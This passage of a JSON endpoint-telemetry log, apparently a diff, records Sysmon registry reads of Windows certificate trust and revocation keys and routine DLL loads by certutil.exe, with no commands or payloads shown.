"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497770000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573498080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498550000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": 
"SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498550000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498860000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573498860000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - 
"image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499490000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499640000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499640000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - 